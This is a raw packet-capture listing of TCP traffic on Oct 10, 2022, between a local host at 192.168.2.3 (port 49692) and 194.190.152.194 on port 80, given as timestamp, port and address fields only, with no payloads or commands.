                                                                                                                                    Oct 10, 2022 06:01:57.571043968 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.571069956 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.571115017 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.571126938 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.571156979 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.571198940 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.571218967 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.571240902 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.571280956 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.571296930 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.571322918 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.571365118 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.571379900 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.571408033 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.571449041 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.571465969 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.571491003 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.571531057 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.571547985 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.571573973 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.571614981 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.571630001 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.571657896 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.571698904 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.571713924 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.571741104 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.571782112 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.571799040 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.571822882 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.571866035 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.571883917 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.571908951 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.571949005 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.571965933 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.571993113 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.572033882 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.572051048 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.572076082 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.572119951 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.572135925 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.572160959 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.572202921 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.572218895 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.572243929 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.572283983 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.572300911 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.572344065 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.572365999 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.572396994 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.572416067 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.572438955 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.572480917 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.572495937 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.572521925 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.572563887 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.572577953 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.572604895 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.572645903 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.572662115 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.572688103 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.572729111 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.572742939 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.572772026 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.572813988 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.572827101 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.572855949 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.572902918 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.572910070 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.572954893 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.572995901 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.573020935 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.573040009 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.573101997 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.574117899 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.574377060 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.574410915 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.574443102 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.574470043 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.574480057 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.574512005 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.574542999 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.574544907 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.574579000 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.574604034 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.574611902 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.574645042 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.574671030 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.574678898 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.574712992 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.574747086 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.574768066 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.574768066 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.574779034 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.574810982 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.574842930 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.574875116 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.574843884 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.574925900 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.574948072 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.574958086 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.574990988 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.574990988 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.575017929 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.575021982 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.575066090 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.575069904 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.575098991 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.575099945 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.575131893 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.575160027 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.575164080 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.575197935 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.575220108 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.575232029 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.575263977 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.575287104 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.575298071 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.575330973 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.575356960 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.575362921 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.575396061 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.575419903 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.575428963 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.575459957 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.575484991 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.575541019 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.577791929 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.588435888 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.588517904 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.598217010 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.598290920 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.598510981 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.634982109 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.635054111 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.635098934 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.635142088 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.635140896 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.635185003 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.635204077 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.635227919 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.635271072 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.635277033 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.635313034 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.635354042 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.635356903 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.635394096 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.635437965 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.635451078 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.635478973 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.635519981 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.635520935 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.635560989 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.635601997 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.635603905 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.635647058 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.635688066 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.635694027 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.635729074 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.635773897 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.635786057 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.635817051 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.635858059 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.635865927 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.635902882 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.635945082 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.635952950 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.635987043 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.636032104 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.636039019 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.636073112 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.636115074 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.636118889 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.636156082 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.636197090 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.636215925 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.636239052 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.636280060 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.636293888 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.636322021 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.636362076 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.636368036 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.636401892 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.636444092 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.636449099 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.636483908 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.636524916 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.636532068 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.636564016 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.636605024 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.636607885 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.636646032 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.636686087 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.636689901 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.636724949 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.636765957 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.636806965 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.636818886 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.636847973 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.636864901 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.636888027 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.636931896 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.636943102 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.636974096 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.637015104 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.637034893 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.637056112 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.637098074 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.637106895 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.637139082 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.637180090 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.637187958 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.637219906 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.637260914 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.637271881 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.637304068 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.637350082 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.637361050 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.637391090 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.637430906 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.637438059 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.637470007 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.637510061 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.637514114 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.637551069 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.637590885 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.637594938 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.637633085 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.637672901 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.637691021 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.637722015 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.637763023 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.637768984 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.637803078 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.637845039 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.637851000 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.637885094 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.637928963 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.637936115 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.637969971 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.638009071 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.638020992 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.638048887 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.638089895 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.638098001 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.638128996 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.638169050 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.638178110 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.638207912 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.638248920 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.638252020 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.638289928 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.638329983 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.638335943 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.638370037 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.638428926 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.638434887 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.638468981 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.638509989 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.638515949 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.638550997 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.638591051 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.638597012 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.638631105 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.638670921 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.638680935 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.638711929 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.638753891 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.638757944 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.638793945 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.638835907 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.638839006 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.638899088 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.638957024 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.638959885 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.638998985 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.639039993 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.639045000 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.639080048 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.639122009 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.639123917 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.639163971 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.639204979 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.639209986 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.639245987 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.639286995 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.639291048 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.639327049 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.639368057 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.639374018 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.639408112 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.639448881 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.639451981 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.639491081 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.639530897 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.639533997 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.639571905 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.639612913 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.639617920 CEST4969280192.168.2.3194.190.152.194
                                                                                                                                    Oct 10, 2022 06:01:57.639652014 CEST8049692194.190.152.194192.168.2.3
                                                                                                                                    Oct 10, 2022 06:01:57.639692068 CEST8049692194.190.152.194192.168.2.3
